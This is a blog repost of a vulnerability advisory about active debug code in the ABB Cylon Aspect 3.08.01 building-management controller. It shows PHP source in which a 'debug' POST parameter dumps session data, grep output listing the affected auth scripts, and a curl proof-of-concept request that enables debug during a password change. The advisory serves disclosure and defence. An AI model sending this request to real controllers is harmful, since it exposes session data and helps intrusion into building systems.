{"id":59976,"date":"2024-10-29T20:59:59","date_gmt":"2024-10-29T17:59:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182370\/ZSL-2024-5851.txt"},"modified":"2024-10-29T20:59:59","modified_gmt":"2024-10-29T17:59:59","slug":"abb-cylon-aspect-3-08-01-active-debug-data-exposure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/abb-cylon-aspect-3-08-01-active-debug-data-exposure\/","title":{"rendered":"ABB Cylon Aspect 3.08.01 Active Debug Data Exposure"},"content":{"rendered":"

ABB Cylon Aspect 3.08.01 (auth\/) Active Debug Code Vulnerability<\/p>\n

Vendor: ABB Ltd.
Product web page: https:\/\/www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: 3.08.01<\/p>\n

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.<\/p>\n

Desc: The ABB BMS\/BAS controller is deployed to unauthorized actors with debugging
code still enabled or active, which can create unintended entry points or expose
sensitive information.<\/p>\n

Tested on: GNU\/Linux 3.15.10 (armv7l)
GNU\/Linux 3.10.0 (x86_64)
GNU\/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP\/7.3.11
PHP\/5.6.30
PHP\/5.4.16
PHP\/4.4.8
PHP\/5.3.3
AspectFT Automation Application Server
lighttpd\/1.4.32
lighttpd\/1.4.18
Apache\/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience<\/p>\n

Advisory ID: ZSL-2024-5851
Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5851.php
CWE ID: 489
CWE URL: https:\/\/cwe.mitre.org\/data\/definitions\/489.html<\/p>\n

21.04.2024<\/p>\n

—<\/p>\n

$ cat project<\/p>\n

P R O J E C T<\/p>\n

.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n

$ .\/db_list.sh ..\/
[*] DEBUG enabled for:
\/htmlroot\/auth\/changePassword.php
\/htmlroot\/auth\/checkPassword.php
\/htmlroot\/auth\/passwordRules.php
\/htmlroot\/auth\/sessionCreate.php
\/htmlroot\/auth\/sessionLogout.php
\/htmlroot\/auth\/sessionValidate.php
$ head -n 12 auth\/changePassword.php | cat -n<\/p>\n

1 <?php
2 $post = (empty($_POST)) ? json_decode(file_get_contents(‘php:\/\/input’), true) : $_POST;
3
4 $debug = (isset($post[‘debug’]) && $post[‘debug’] === ‘On’);
5
6 if ($debug) {
7 ini_set(‘display_startup_errors’, 1);
8 ini_set(‘display_errors’, 1);
9 error_reporting(-1);
10 }
11
12 session_start();
$ cat auth\/changePassword.php | grep 84
84 if (debug) $data->_SESSION = $_SESSION;
$ grep -irnHE “debug)|debug )” auth\/*.php
auth\/changePassword.php:6:if ($debug) {
auth\/changePassword.php:84:if ($debug) $data->_SESSION = $_SESSION;
auth\/checkPassword.php:6:if ($debug) {
auth\/checkPassword.php:54:if ($debug) $data->_SESSION = $_SESSION;
auth\/passwordRules.php:6:if ($debug) {
auth\/passwordRules.php:36:if ($debug) $data->_SESSION = $_SESSION;
auth\/sessionCreate.php:6:if ($debug) {
auth\/sessionCreate.php:57:if ($debug) $data->_SESSION = $_SESSION;
auth\/sessionLogout.php:6:if ($debug) {
auth\/sessionLogout.php:31:if( $debug ) $data->_SESSION = $_SESSION;
auth\/sessionValidate.php:6:if ($debug) {
auth\/sessionValidate.php:45:if( $debug ) $data->_SESSION = $_SESSION;<\/p>\n

$ curl -X POST “http:\/\/192.168.73.31\/auth\/changePassword.php” \\
> -d “{\\
> \\”appid\\”:\\”1\\”,\\
> \\”user\\”:\\”teppei\\”,\\
> \\”oldpass\\”:\\”123456\\”,\\
> \\”newpass\\”:\\”654321\\”,\\
> \\”forcelogout\\”:\\”?\\”,\\
> \\”debug\\”:\\”On\\”\\
> }”<\/p>\n","protected":false},"excerpt":{"rendered":"

ABB Cylon Aspect 3.08.01 (auth\/) Active Debug Code Vulnerability Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: 3.08.01 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: The ABB BMS\/BAS controller …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59976","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59976"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59976\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}